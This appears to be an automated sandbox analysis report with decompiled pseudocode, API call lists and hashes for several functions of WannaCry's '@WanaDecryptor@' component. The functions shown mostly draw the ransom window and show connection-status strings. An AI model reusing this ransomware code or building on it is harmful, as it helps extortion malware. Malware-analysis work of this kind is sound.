                                                      Yara matches
                                                      Similarity
                                                      • API ID: AddressProc$LibraryLoad
                                                      • String ID: CloseHandle$CreateFileW$DeleteFileW$MoveFileExW$MoveFileW$ReadFile$WriteFile$kernel32.dll
                                                      • API String ID: 2238633743-1294736154
                                                      • Opcode ID: 468b1d099fd8a0684a95be66b91aae829347793d9c58d8a41e664e10bf98f029
                                                      • Instruction ID: a2b5d8bb757b14b28e15fb80ad1863100e1319e91a413c2d323d0fcc62a15203
                                                      • Opcode Fuzzy Hash: 468b1d099fd8a0684a95be66b91aae829347793d9c58d8a41e664e10bf98f029
                                                      • Instruction Fuzzy Hash: AA110334B423216BD734AB25BD58FA72695EFD4701795003FA801E76E1D7B89C42CA5C
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00405580 Relevance: 27.2, APIs: 18, Instructions: 187windowCOMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 78%
                                                      			E00405580(void* __ecx) {
				int _v8;
				intOrPtr _v12;
				char _v28;
				char _v80;
				void* _v96;
				struct tagRECT _v112;
				signed int _v116;
				void* _v120;
				struct HDC__* _v140;
				long _v144;
				struct tagRECT _v160;
				char _v164;
				void* _v172;
				intOrPtr _v176;
				char _v188;
				int _v192;
				int _v196;
				int _v204;
				intOrPtr _v212;
				void* _v216;
				struct HBRUSH__* _v220;
				char _v224;
				intOrPtr _v228;
				void* _v244;
				intOrPtr _v248;
				intOrPtr _v252;
				signed int _v256;
				void* _v260;
				void* _v264;
				void* _v268;
				int _v272;
				intOrPtr _v296;
				intOrPtr _v300;
				intOrPtr _v304;
				int _t78;
				long _t79;
				struct HBRUSH__* _t80;
				struct HDC__* _t84;
				char _t85;
				struct HBRUSH__* _t86;
				intOrPtr _t89;
				intOrPtr _t90;
				intOrPtr _t102;
				intOrPtr _t104;
				intOrPtr _t108;
				intOrPtr _t136;
				void* _t151;
				struct HBRUSH__* _t152;
				void* _t153;
				void* _t156;
				int _t160;
				intOrPtr _t162;

				_push(0xffffffff);
				_push(E00413943);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t162;
				_t156 = __ecx;
				_t78 = GetClientRect( *(__ecx + 0x20),  &_v112);
				_t160 = 0;
				_v204 = 0;
				_t108 =  *((intOrPtr*)( *((intOrPtr*)(_t156 + 0x44)) - 8));
				_v176 = _t108;
				if(_t108 != 0) {
					L00412DD0();
					_t79 =  *(_t156 + 0x50);
					_v8 = 0;
					_v164 = 0xffb53f;
					_v160.left = _t79;
					_v160.top = 0x674017;
					_v160.right =  *((intOrPtr*)(_t156 + 0x4c));
					_v160.bottom = 0;
					_v144 =  *(_t156 + 0x54);
					L00412E5A();
					_t80 =  *((intOrPtr*)(_t79 + 8));
					__imp__#8(_t80,  *((intOrPtr*)(_t156 + 0x58)), 0,  &_v164, 3, _t156, _t151);
					_t152 = _t80;
					_v220 = _t152;
					L00412E54();
					asm("sbb eax, eax");
					_v28 = 1;
					_t84 = CreateCompatibleDC( ~( &_v120) & _v116);
					_push(_t84);
					L00412E4E();
					_push(_t152);
					L00412DE2();
					if(_t84 != 0) {
						_t84 =  *(_t84 + 4);
					}
					_push(_t84);
					_t85 = _v224;
					_push(_t85);
					L00412E48();
					_v212 = _t85;
					_t153 = 0;
					_v252 = 1;
					_t86 = CreateSolidBrush( *(_t156 + 0x54));
					_v220 = _t86;
					FillRect(_v140,  &_v160, _t86);
					_t89 = 0;
					_v260 = 0;
					if(_t108 > 0) {
						do {
							_v224 =  *((intOrPtr*)( *((intOrPtr*)(_t156 + 0x44)) + _t89));
							E00405110(_t156,  &_v188, _v224);
							asm("sbb eax, eax");
							BitBlt(_v160, _t160, _v272,  *((intOrPtr*)(_t156 + 0x60)) +  *((intOrPtr*)(_t156 + 0x68)),  *((intOrPtr*)(_t156 + 0x64)) +  *((intOrPtr*)(_t156 + 0x6c)),  ~( &_v260) & _v256, _v196, _v192, 0xcc0020);
							_t102 =  *((intOrPtr*)(_t156 + 0x74));
							_t160 = _t160 +  *((intOrPtr*)(_t156 + 0x60)) +  *((intOrPtr*)(_t156 + 0x68));
							_t153 = _t153 + 1;
							if(_t153 != _t102) {
								goto L10;
							} else {
								_t136 =  *((intOrPtr*)(_t156 + 0x70));
								if(_t136 != 1) {
									if(_t153 != _t102) {
										goto L10;
									} else {
										_t104 = _t136;
										if(_t104 <= 1) {
											goto L10;
										} else {
											if(_v304 != _t104) {
												_t153 = 0;
												_t160 = 0;
												_v300 = _v300 +  *((intOrPtr*)(_t156 + 0x64)) +  *((intOrPtr*)(_t156 + 0x6c));
												_v304 = _v304 + 1;
												goto L10;
											}
										}
									}
								}
							}
							goto L11;
							L10:
							_t89 = _v296 + 1;
							_v296 = _t89;
						} while (_t89 < _v272);
					}
					L11:
					_t90 = _v228;
					if(_t90 != 0) {
						_t90 =  *((intOrPtr*)(_t90 + 4));
					}
					_push(_t90);
					_push(_v248);
					L00412E48();
					L00412E42();
					DeleteObject(_v264);
					_t78 = DeleteObject(_v244);
					_v80 = 0;
					L00412E3C();
					_v80 = 0xffffffff;
					L00412DB8();
				}
				 *[fs:0x0] = _v12;
				return _t78;
			}























































                                                      0x00405580
                                                      0x00405582
                                                      0x0040558d
                                                      0x0040558e
                                                      0x0040559e
                                                      0x004055a9
                                                      0x004055b2
                                                      0x004055b4
                                                      0x004055b8
                                                      0x004055bd
                                                      0x004055c1
                                                      0x004055d0
                                                      0x004055d5
                                                      0x004055de
                                                      0x004055e5
                                                      0x004055ed
                                                      0x004055f1
                                                      0x004055f9
                                                      0x004055fd
                                                      0x00405601
                                                      0x00405605
                                                      0x0040560d
                                                      0x0040561a
                                                      0x00405620
                                                      0x00405626
                                                      0x0040562a
                                                      0x0040563f
                                                      0x00405641
                                                      0x0040564c
                                                      0x00405652
                                                      0x00405657
                                                      0x0040565c
                                                      0x0040565d
                                                      0x00405664
                                                      0x00405666
                                                      0x00405666
                                                      0x00405669
                                                      0x0040566a
                                                      0x0040566e
                                                      0x0040566f
                                                      0x00405677
                                                      0x0040567c
                                                      0x0040567e
                                                      0x00405686
                                                      0x0040568c
                                                      0x0040569e
                                                      0x004056a4
                                                      0x004056a8
                                                      0x004056ac
                                                      0x004056b2
                                                      0x004056bc
                                                      0x004056c8
                                                      0x004056e7
                                                      0x0040570b
                                                      0x00405719
                                                      0x0040571c
                                                      0x0040571e
                                                      0x00405721
                                                      0x00000000
                                                      0x00405723
                                                      0x00405723
                                                      0x00405729
                                                      0x0040572d
                                                      0x00000000
                                                      0x0040572f
                                                      0x0040572f
                                                      0x00405734
                                                      0x00000000
                                                      0x00405736
                                                      0x0040573a
                                                      0x0040574c
                                                      0x0040574e
                                                      0x00405753
                                                      0x00405757
                                                      0x00000000
                                                      0x00405757
                                                      0x0040573a
                                                      0x00405734
                                                      0x0040572d
                                                      0x00405729
                                                      0x00000000
                                                      0x0040575b
                                                      0x00405763
                                                      0x00405766
                                                      0x00405766
                                                      0x004056b2
                                                      0x00405770
                                                      0x00405770
                                                      0x00405777
                                                      0x00405779
                                                      0x00405779
                                                      0x0040577c
                                                      0x00405781
                                                      0x00405782
                                                      0x0040578b
                                                      0x0040579b
                                                      0x004057a2
                                                      0x004057a8
                                                      0x004057b0
                                                      0x004057b9
                                                      0x004057c4
                                                      0x004057c4
                                                      0x004057d3
                                                      0x004057e0

                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 0000001C.00000002.4450384819.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000001C.00000002.4450341169.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 0000001C.00000002.4450550901.0000000000415000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 0000001C.00000002.4450641363.000000000041F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 0000001C.00000002.4450693015.0000000000421000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 0000001C.00000002.4450741084.0000000000423000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_28_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: #5785CreateDeleteObjectRect$#1168#1640#2405#2860#323#470#640#755BrushClientCompatibleFillSolid
                                                      • String ID:
                                                      • API String ID: 1233696098-0
                                                      • Opcode ID: 3787f29b2f3b6759b14921245bb0c5350f6533f71f74a9e78965702df0d7f065
                                                      • Instruction ID: b627e9c1237585dd637a27707791d59f98fdace04f8481d3914a5fbe5096edf5
                                                      • Opcode Fuzzy Hash: 3787f29b2f3b6759b14921245bb0c5350f6533f71f74a9e78965702df0d7f065
                                                      • Instruction Fuzzy Hash: 057135716087419FC324DF69C984AABB7E9FB88704F004A2EF59AC3350DB74E845CB66
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00408D70 Relevance: 26.5, APIs: 14, Strings: 1, Instructions: 257COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 75%
                                                      			E00408D70(intOrPtr __ecx, signed long long __fp0, intOrPtr* _a4, int _a8, signed int _a12, unsigned int _a16, signed int _a20) {
				intOrPtr _v0;
				unsigned int _v4;
				unsigned int _v8;
				unsigned int _v12;
				intOrPtr _v20;
				char _v36;
				intOrPtr _v56;
				char _v60;
				intOrPtr _v64;
				char _v68;
				unsigned int _v72;
				signed int _v76;
				signed int _v80;
				intOrPtr _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed long long _v100;
				intOrPtr _v104;
				void* _v108;
				void* _v112;
				void* _v120;
				unsigned int _t93;
				signed int _t96;
				signed int _t100;
				unsigned int _t102;
				signed int _t107;
				int _t112;
				char _t113;
				signed char _t115;
				RECT* _t122;
				signed int _t125;
				signed int _t134;
				intOrPtr* _t135;
				unsigned int _t138;
				signed int _t140;
				signed int _t143;
				intOrPtr* _t146;
				char _t151;
				char _t152;
				signed int _t169;
				intOrPtr* _t177;
				signed int _t192;
				intOrPtr* _t193;
				intOrPtr _t195;
				unsigned int _t202;
				char _t209;
				intOrPtr _t210;
				signed long long _t228;
				signed long long _t229;
				signed long long _t230;
				signed long long _t231;
				signed long long _t234;

				_t228 = __fp0;
				_push(0xffffffff);
				_push(E004140A0);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t210;
				_t93 = _a20;
				_v104 = __ecx;
				_t138 = _a16;
				_t169 = _t138 & 0x000000ff;
				_v76 = _t169;
				_t192 = (_t93 & 0x000000ff) - _t169;
				_t140 = _t138 >> 0x00000010 & 0x000000ff;
				_t96 = (_t93 >> 0x00000010 & 0x000000ff) - _t140;
				_v88 = 0;
				_v96 = _t96;
				_v92 = _t140;
				asm("cdq");
				_t143 = _t96 ^ 0;
				_v100 = 0;
				asm("cdq");
				_a20 = _t192;
				_t134 = 0;
				if(0 <= _t143) {
					_t134 = _t143;
				}
				asm("cdq");
				_t100 = _t192 ^ 0;
				if(_t100 <= _t134) {
					_a16 = 0;
					if(0 <= _t143) {
						_a16 = _t143;
					}
				} else {
					_a16 = _t100;
				}
				_t193 = _a8;
				_t102 =  *((intOrPtr*)(_t193 + 8)) -  *_t193;
				if(_t102 < _a16) {
					_a16 = _t102;
				}
				if(_a16 == 0) {
					_a16 = 1;
				}
				asm("fild dword [esp+0x88]");
				asm("fild dword [esp+0x8c]");
				_t135 = _a4;
				_t229 = _t228 / st1;
				_v80 = _t229;
				asm("fild dword [esp+0x1c]");
				_t230 = _t229 / st1;
				_v100 = _t230;
				asm("fild dword [esp+0x20]");
				_t231 = _t230 / st1;
				_v96 = _t231;
				st0 = _t231;
				_t107 = GetDeviceCaps( *( *_t135 + 8), 0x26) & 0x00000100;
				_v80 = _t107;
				if(_t107 == 0 && _a8 > 1) {
					_t125 = GetDeviceCaps( *( *_t135 + 8), 0xc);
					if(GetDeviceCaps( *( *_t135 + 8), 0xe) * _t125 < 8) {
						_v8 = 1;
					}
				}
				_t146 = _t193;
				_a12 =  *((intOrPtr*)(_t193 + 8)) -  *_t193;
				_t202 = 0;
				asm("fild dword [esp+0x8c]");
				_v72 = 0;
				_v68 =  *_t146;
				_v76 = 0x415a44;
				asm("fidiv dword [esp+0x88]");
				_v64 =  *((intOrPtr*)(_t146 + 4));
				_v60 =  *((intOrPtr*)(_t146 + 8));
				_v56 =  *((intOrPtr*)(_t146 + 0xc));
				_a12 = _t231;
				_t112 = _a8;
				_v12 = 0;
				_v4 = 0;
				if(_t112 <= 0) {
					L31:
					_v76 = 0x415c00;
					_v12 = 1;
					L00412D52();
					 *[fs:0x0] = _v20;
					return _t112;
				} else {
					while(1) {
						asm("fild dword [esp+0x7c]");
						_t195 =  *_t193;
						L0041304A();
						_t46 = _t202 + 1; // 0x1
						_v4 = _t46;
						_t209 = _t112 + _t195;
						asm("fild dword [esp+0x7c]");
						_v68 = _t209;
						_t234 = st0 * _a12 * _a12;
						L0041304A();
						_t113 = _t112 + _t195;
						_v60 = _t113;
						if(_t202 == _a8 - 1) {
							_t113 =  *((intOrPtr*)(_v0 + 8));
							_v60 = _t113;
						}
						_t177 = _a4;
						_t151 =  *_t177;
						if(_t113 < _t151) {
							goto L29;
						}
						if(_t209 < _t151) {
							_v68 = _t151;
						}
						_t152 =  *((intOrPtr*)(_t177 + 8));
						if(_t113 > _t152) {
							_v60 = _t152;
						}
						L0041304A();
						_v92 = 0;
						L0041304A();
						_t115 = _t113 + _v100 + _v96;
						_v92 = _t115 << 8;
						L0041304A();
						_push(_t115 + _v84 & 0x000000ff | _v92);
						if(_v80 == 0) {
							_t112 = E00409D40( &_v36, _t135,  &_v68);
							_push(_t112);
							L00412FF2();
						} else {
							_push(CreateSolidBrush());
							L00412D5E();
							_t122 = E00409D40( &_v60, _t135,  &_v76);
							_t76 =  &_v96; // 0x415a44
							asm("sbb ecx, ecx");
							_t112 = FillRect( *( *_t135 + 4), _t122,  ~_t76 & _v92);
							L00412D52();
						}
						if(_v68 <  *((intOrPtr*)(_v4 + 8))) {
							L30:
							_t202 = _v4;
							_t112 = _a8;
							_v4 = _t202;
							if(_t202 < _t112) {
								_t193 = _v0;
								continue;
							}
						}
						goto L31;
						L29:
						st0 = _t234;
						goto L30;
					}
				}
			}
























































                                                      0x00408d70
                                                      0x00408d70
                                                      0x00408d72
                                                      0x00408d7d
                                                      0x00408d7e
                                                      0x00408d88
                                                      0x00408d8d
                                                      0x00408d92
                                                      0x00408d9f
                                                      0x00408dab
                                                      0x00408daf
                                                      0x00408dc5
                                                      0x00408dd6
                                                      0x00408dd8
                                                      0x00408dde
                                                      0x00408de2
                                                      0x00408de6
                                                      0x00408def
                                                      0x00408df1
                                                      0x00408df5
                                                      0x00408df8
                                                      0x00408e05
                                                      0x00408e07
                                                      0x00408e09
                                                      0x00408e09
                                                      0x00408e0d
                                                      0x00408e10
                                                      0x00408e14
                                                      0x00408e21
                                                      0x00408e28
                                                      0x00408e2a
                                                      0x00408e2a
                                                      0x00408e16
                                                      0x00408e16
                                                      0x00408e16
                                                      0x00408e31
                                                      0x00408e44
                                                      0x00408e48
                                                      0x00408e4a
                                                      0x00408e4a
                                                      0x00408e5a
                                                      0x00408e5c
                                                      0x00408e5c
                                                      0x00408e67
                                                      0x00408e6e
                                                      0x00408e75
                                                      0x00408e81
                                                      0x00408e89
                                                      0x00408e8d
                                                      0x00408e91
                                                      0x00408e93
                                                      0x00408e97
                                                      0x00408e9b
                                                      0x00408e9d
                                                      0x00408ea1
                                                      0x00408ea5
                                                      0x00408eaa
                                                      0x00408eae
                                                      0x00408ec2
                                                      0x00408ed6
                                                      0x00408ed8
                                                      0x00408ed8
                                                      0x00408ed6
                                                      0x00408eea
                                                      0x00408eec
                                                      0x00408ef3
                                                      0x00408ef5
                                                      0x00408efe
                                                      0x00408f02
                                                      0x00408f06
                                                      0x00408f0e
                                                      0x00408f18
                                                      0x00408f1f
                                                      0x00408f26
                                                      0x00408f2a
                                                      0x00408f31
                                                      0x00408f38
                                                      0x00408f3e
                                                      0x00408f42
                                                      0x004090b6
                                                      0x004090b6
                                                      0x004090c2
                                                      0x004090ca
                                                      0x004090d7
                                                      0x004090e1
                                                      0x00408f48
                                                      0x00408f51
                                                      0x00408f51
                                                      0x00408f55
                                                      0x00408f60
                                                      0x00408f65
                                                      0x00408f6a
                                                      0x00408f6e
                                                      0x00408f70
                                                      0x00408f74
                                                      0x00408f78
                                                      0x00408f7f
                                                      0x00408f8b
                                                      0x00408f8d
                                                      0x00408f96
                                                      0x00408f9f
                                                      0x00408fa2
                                                      0x00408fa2
                                                      0x00408fa6
                                                      0x00408fad
                                                      0x00408fb1
                                                      0x00000000
                                                      0x00000000
                                                      0x00408fb9
                                                      0x00408fbb
                                                      0x00408fbb
                                                      0x00408fbf
                                                      0x00408fc4
                                                      0x00408fc6
                                                      0x00408fc6
                                                      0x00408fd0
                                                      0x00408fe5
                                                      0x00408fe9
                                                      0x00408ffa
                                                      0x00409001
                                                      0x00409005
                                                      0x00409021
                                                      0x00409022
                                                      0x0040907e
                                                      0x00409085
                                                      0x00409086
                                                      0x00409024
                                                      0x0040902a
                                                      0x0040902f
                                                      0x00409043
                                                      0x0040904e
                                                      0x00409054
                                                      0x0040905e
                                                      0x00409068
                                                      0x00409068
                                                      0x00409099
                                                      0x0040909f
                                                      0x0040909f
                                                      0x004090a3
                                                      0x004090ac
                                                      0x004090b0
                                                      0x00408f4a
                                                      0x00000000
                                                      0x00408f4a
                                                      0x004090b0
                                                      0x00000000
                                                      0x0040909d
                                                      0x0040909d
                                                      0x00000000
                                                      0x0040909d
                                                      0x00408f51

                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000001C.00000002.4450384819.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000001C.00000002.4450341169.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 0000001C.00000002.4450550901.0000000000415000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 0000001C.00000002.4450641363.000000000041F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 0000001C.00000002.4450693015.0000000000421000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 0000001C.00000002.4450741084.0000000000423000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_28_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: _ftol$CapsDevice$#2414$#1641#2754BrushCreateFillRectSolid
                                                      • String ID: DZA
                                                      • API String ID: 2487345631-3378329814
                                                      • Opcode ID: 46f8ac59b565287c612820a18e91b1c7afa6038287a955736cfc91f47d65fae1
                                                      • Instruction ID: dda82c2241e8f2351b86cfb5efeedf8da928c70a362fdc9ee550b763b14e0e54
                                                      • Opcode Fuzzy Hash: 46f8ac59b565287c612820a18e91b1c7afa6038287a955736cfc91f47d65fae1
                                                      • Instruction Fuzzy Hash: 2CA147716087418FC324DF25C984AAABBE1FFC8704F148A2EF599D7291DA39D845CF86
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00401600 Relevance: 26.4, APIs: 11, Strings: 4, Instructions: 120windowCOMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 65%
                                                      			E00401600(void* __ecx, intOrPtr _a4, long _a8, intOrPtr _a12) {
				void* _t19;
				long _t21;
				long _t24;
				void* _t25;
				void* _t26;
				intOrPtr _t27;
				long _t48;
				void* _t49;
				intOrPtr _t50;

				_t27 = _a4;
				_t48 = _a8;
				_t19 = _t27 - 0x4e20;
				_t49 = __ecx;
				if(_t19 == 0) {
					if(_t48 != 0) {
						if(_t48 == 0xffffffff) {
							goto L14;
						}
						goto L15;
					} else {
						_push(__ecx);
						_a4 = _t50;
						L00412CAA();
						E00401970("Connected");
						_t21 = SendMessageA( *(_t49 + 0x80), 0x402, 0x1e, _t48);
						_push(_a4);
						_push(_t48);
						_push(_t27);
						 *(_t49 + 0xb0) = 0x23;
						L00412BAE();
						return _t21;
					}
				} else {
					_t19 = _t19 - 1;
					if(_t19 == 0) {
						if(_t48 != 0) {
							goto L9;
						} else {
							_push(__ecx);
							_a4 = _t50;
							L00412CAA();
							E00401970("Sent request");
							_t24 = SendMessageA( *(_t49 + 0x80), 0x402, 0x23, _t48);
							_push(_a4);
							_push(_t48);
							_push(_t27);
							 *(_t49 + 0xb0) = 0x28;
							L00412BAE();
							return _t24;
						}
					} else {
						_t19 = _t19 - 1;
						if(_t19 != 0) {
							L15:
							_push(_a12);
							_push(_t48);
							_push(_t27);
							L00412BAE();
							return _t19;
						} else {
							if(_t48 != 0) {
								if(_t48 != 1) {
									L9:
									if(_t48 == 0xffffffff) {
										L14:
										 *((intOrPtr*)(_t49 + 0xa8)) = 0xffffffff;
									}
									goto L15;
								} else {
									_push(__ecx);
									_a4 = _t50;
									L00412CAA();
									_t25 = E00401970("Succeed");
									_push(_a4);
									_push(_t48);
									_push(_t27);
									L00412BAE();
									return _t25;
								}
							} else {
								_push(__ecx);
								_a4 = _t50;
								L00412CAA();
								_t26 = E00401970("Received response");
								_push(_a4);
								_push(_t48);
								_push(_t27);
								 *((intOrPtr*)(_t49 + 0xa8)) = 1;
								L00412BAE();
								return _t26;
							}
						}
					}
				}
			}












                                                      0x00401601
                                                      0x00401609
                                                      0x0040160d
                                                      0x00401612
                                                      0x00401614
                                                      0x004016e7
                                                      0x00401737
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x004016e9
                                                      0x004016e9
                                                      0x004016ec
                                                      0x004016f5
                                                      0x004016fc
                                                      0x00401710
                                                      0x0040171c
                                                      0x0040171d
                                                      0x0040171e
                                                      0x0040171f
                                                      0x00401729
                                                      0x00401731
                                                      0x00401731
                                                      0x0040161a
                                                      0x0040161a
                                                      0x0040161b
                                                      0x00401691
                                                      0x00000000
                                                      0x00401693
                                                      0x00401693
                                                      0x00401696
                                                      0x0040169f
                                                      0x004016a6
                                                      0x004016ba
                                                      0x004016c6
                                                      0x004016c7
                                                      0x004016c8
                                                      0x004016c9
                                                      0x004016d3
                                                      0x004016db
                                                      0x004016db
                                                      0x0040161d
                                                      0x0040161d
                                                      0x0040161e
                                                      0x00401743
                                                      0x00401749
                                                      0x0040174a
                                                      0x0040174b
                                                      0x0040174c
                                                      0x00401754
                                                      0x00401624
                                                      0x00401626
                                                      0x00401661
                                                      0x004016de
                                                      0x004016e1
                                                      0x00401739
                                                      0x00401739
                                                      0x00401739
                                                      0x00000000
                                                      0x00401663
                                                      0x00401663
                                                      0x00401666
                                                      0x0040166f
                                                      0x00401676
                                                      0x00401681
                                                      0x00401682
                                                      0x00401683
                                                      0x00401684
                                                      0x0040168c
                                                      0x0040168c
                                                      0x00401628
                                                      0x00401628
                                                      0x0040162b
                                                      0x00401634
                                                      0x0040163b
                                                      0x00401646
                                                      0x00401647
                                                      0x00401648
                                                      0x00401649
                                                      0x00401653
                                                      0x0040165b
                                                      0x0040165b
                                                      0x00401626
                                                      0x0040161e
                                                      0x0040161b

                                                      APIs
                                                      • #2385.MFC42 ref: 00401653
                                                      • #537.MFC42(Received response), ref: 00401634
                                                        • Part of subcall function 00401970: #3092.MFC42(00000406,?,00000000,004134D8,000000FF,00401199,Connecting to server...), ref: 00401997
                                                        • Part of subcall function 00401970: #6199.MFC42(00000406,?,00000000,004134D8,000000FF,00401199,Connecting to server...), ref: 0040199E
                                                        • Part of subcall function 00401970: #800.MFC42(00000406,?,00000000,004134D8,000000FF,00401199,Connecting to server...), ref: 004019AF
                                                      • #537.MFC42(Succeed), ref: 0040166F
                                                      • #2385.MFC42(?,?,?,Succeed), ref: 00401684
                                                      • #537.MFC42(Sent request), ref: 0040169F
                                                      • SendMessageA.USER32(?,00000402,00000023,?), ref: 004016BA
                                                      • #2385.MFC42 ref: 004016D3
                                                      • #537.MFC42(Connected), ref: 004016F5
                                                      • SendMessageA.USER32(?,00000402,0000001E,?), ref: 00401710
                                                      • #2385.MFC42 ref: 00401729
                                                      • #2385.MFC42(?,?,?), ref: 0040174C
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000001C.00000002.4450384819.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000001C.00000002.4450341169.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 0000001C.00000002.4450550901.0000000000415000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 0000001C.00000002.4450641363.000000000041F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 0000001C.00000002.4450693015.0000000000421000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 0000001C.00000002.4450741084.0000000000423000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_28_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: #2385$#537$MessageSend$#3092#6199#800
                                                      • String ID: Connected$Received response$Sent request$Succeed
                                                      • API String ID: 3790904636-3692714192
                                                      • Opcode ID: 77cbd13b205d5b60acded2d534e2f67ef19f14b7a7dcd1ce5799653af05fca91
                                                      • Instruction ID: e9690c31fbc1831b63af9a5cc079f352e9ea826ed21b4fe1124c0ccffc889961
                                                      • Opcode Fuzzy Hash: 77cbd13b205d5b60acded2d534e2f67ef19f14b7a7dcd1ce5799653af05fca91
                                                      • Instruction Fuzzy Hash: A631E8B130430067C5209F1AD959EAF7B69EBD4BB4F10852FF149A33D1CA795C4582FA
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00404DD0 Relevance: 22.8, APIs: 12, Strings: 1, Instructions: 89windowCOMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 78%
                                                      			E00404DD0(void* __ecx) {
				intOrPtr _t12;
				long _t13;
				struct HFONT__* _t15;
				long _t16;
				long _t17;
				int _t29;
				int _t32;
				int _t35;

				L00412CB0();
				_t12 =  *0x42189c; // 0x0
				_t13 =  *(_t12 + 0x824);
				 *(__ecx + 0x6c) = _t13;
				_push(CreateSolidBrush(_t13));
				L00412D5E();
				_t35 = __ecx + 0x70;
				_t15 = CreateFontA(0x10, 0, 0, 0, 0x2bc, 0, 0, 0, 0, 0, 0, 0, 0x20, "Arial");
				_push(_t15);
				L00412D5E();
				_push(0x403);
				L00412CE6();
				if(_t35 != 0) {
					_t29 =  *(_t35 + 4);
				} else {
					_t29 = 0;
				}
				_t16 = SendMessageA( *(_t15 + 0x20), 0x30, _t29, 1);
				_push(1);
				L00412CE6();
				if(_t35 != 0) {
					_t32 =  *(_t35 + 4);
				} else {
					_t32 = 0;
				}
				_t17 = SendMessageA( *(_t16 + 0x20), 0x30, _t32, 1);
				_push(2);
				L00412CE6();
				if(_t35 != 0) {
					SendMessageA( *(_t17 + 0x20), 0x30,  *(_t35 + 4), 1);
					return 1;
				} else {
					SendMessageA( *(_t17 + 0x20), 0x30, _t35, 1);
					return 1;
				}
			}











                                                      0x00404dd5
                                                      0x00404dda
                                                      0x00404ddf
                                                      0x00404de6
                                                      0x00404def
                                                      0x00404df3
                                                      0x00404e1a
                                                      0x00404e1d
                                                      0x00404e23
                                                      0x00404e26
                                                      0x00404e2b
                                                      0x00404e32
                                                      0x00404e39
                                                      0x00404e3f
                                                      0x00404e3b
                                                      0x00404e3b
                                                      0x00404e3b
                                                      0x00404e51
                                                      0x00404e53
                                                      0x00404e57
                                                      0x00404e5e
                                                      0x00404e64
                                                      0x00404e60
                                                      0x00404e60
                                                      0x00404e60
                                                      0x00404e70
                                                      0x00404e72
                                                      0x00404e76
                                                      0x00404e7d
                                                      0x00404e9f
                                                      0x00404ea9
                                                      0x00404e7f
                                                      0x00404e88
                                                      0x00404e92
                                                      0x00404e92

                                                      APIs
                                                      • #4710.MFC42 ref: 00404DD5
                                                      • CreateSolidBrush.GDI32(?), ref: 00404DE9
                                                      • #1641.MFC42(00000000), ref: 00404DF3
                                                      • CreateFontA.GDI32(00000010,00000000,00000000,00000000,000002BC,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000020,Arial), ref: 00404E1D
                                                      • #1641.MFC42(00000000), ref: 00404E26
                                                      • #3092.MFC42(00000403,00000000), ref: 00404E32
                                                      • SendMessageA.USER32(?,00000030,?,00000001), ref: 00404E51
                                                      • #3092.MFC42(00000001), ref: 00404E57
                                                      • SendMessageA.USER32(?,00000030,?,00000001), ref: 00404E70
                                                      • #3092.MFC42(00000002), ref: 00404E76
                                                      • SendMessageA.USER32(?,00000030,?,00000001), ref: 00404E88
                                                      • SendMessageA.USER32(?,00000030,?,00000001), ref: 00404E9F
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000001C.00000002.4450384819.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000001C.00000002.4450341169.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 0000001C.00000002.4450550901.0000000000415000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 0000001C.00000002.4450641363.000000000041F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 0000001C.00000002.4450693015.0000000000421000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 0000001C.00000002.4450741084.0000000000423000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_28_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
